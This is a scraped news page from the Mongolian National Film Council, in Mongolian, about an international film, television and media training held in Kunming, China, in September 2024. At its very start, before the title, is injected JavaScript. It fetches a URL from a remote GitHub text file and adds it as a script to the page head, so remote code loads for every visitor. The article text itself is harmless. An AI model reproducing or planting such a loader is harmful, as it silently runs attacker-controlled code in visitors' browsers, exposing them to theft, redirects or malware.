;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Олон Улсын Кино, телевиз, медиа салбарын сургалт, хэлэлцүүлэг зохион байгуулагдаж байна - Mongolian National Film Council

Олон Улсын Кино, телевиз, медиа салбарын сургалт, хэлэлцүүлэг зохион байгуулагдаж байна

Олон Улсын Кино, телевиз, медиа салбарын сургалт, хэлэлцүүлэг зохион байгуулагдаж байна
Олон Улсын Кино, телевиз, медиа салбарын сургалт, хэлэлцүүлэг БНХАУ-ын Юньнань мужийн Куньмин хотод зохион байгуулагдаж байна
БНХАУ-ын худалдааны яам, Юньнаны Олон улсын Эдийн засаг, Техникийн Солилцооны Төвтэй хамтранзохион байгуулж буй сургалт 2024 оны 09 дүгээр сарын 5-наас 18-ны өдрүүдэд Юньнань мужийн Куньмин хотод зохион байгуулагдаж байна.
Тус сургалтад нийт 8 орны 31 төлөөлөгч оролцож байгаа бөгөөд Монгол Улсаас Соёл, спорт, аялал жуулчлал, залуучуудын яамны мэргэжилтнүүд болон Монголын Кино Урлагийн Зөвлөл, Ажлын албаны төлөөлөл оролцож байна. Сургалтын нээлтийн арга хэмжээний үеэр оролцогчдыг төлөөлж ССАЖЗЯ-ны ГХХАГ-ын ахлах мэргэжилтэн Р.Цээноров үг хэллээ.
Энэхүү мэргэжил дээшлүүлэх сургалт БНХАУ болон холбогдох орнуудын найрамдал, хамтын ажиллагааг ахиулах гүүр болж эдийн засаг, болон худалдаа бусад салбарын хамтын ажиллагааг харилцан солилцож хэлэлцэх замаар хөгжиж буй орнуудын хүний нөөцийг нээн хөгжүүлэх ба нийгмийн хөгжил, эдийн засаг, соёл урлаг, мэдээллийн томоохон салбарын чадварыг ахиулах зорилготой юм.
Мэргэжил дээшлүүлэх сургалтын үндсэн үйл ажиллагаа нь лекц, хэлэлцүүлэг, БНХАУ-ын телевизүүд, кино үйлдвэрлэлийн байгууллагад зочлох зэрэг багтана.
Сургалтын лекцийн агуулгаас дурдвал:
– Мэдээллийн эрин үед мэдээг сурталчилгааны хэрэгсэл болгон хэрхэн зөв ашиглах талаар танилцуулах бөгөөд үйл явдлын сурталчилгааг дэмжихэд илүү үр дүнтэй болох аргачлалыг танилцуулах.
– Кино болон телевизийн салбарын хөгжлийн чиг хандлага, зах зээлийн хэтийн төлөв, ирээдүйн төлөвийг шинжлэх замаар оролцогчдод зааварлах талаар БНХАУ-ын тухайн салбаруудын удирдах албан тушаалтнууд болон их дээд сургуулийн хүндэт профессор багш нар удирдан явуулна.
Сургалтын хүрээнд болох үйл явдлын хэсгээс дурдвал:
– Юннаны мэдээллийн байгууллагын үйлдвэрлэл, дамжуулалт, мэдээлэл тараах үйл ажиллагаатай танилцах, оролцогч орнуудын хооронд соёлын солилцоог дэмжих
– БНХАУ-ын Хунань мужийн Чанша хотын соёл, мэдээллийн салбарын хөгжилтэй танилцах
-Кино болон телевиз, тэдгээр байгууллагын бүтэц, үйл ажиллагаатай танилцах зэрэг сэдвүүд багтжээ.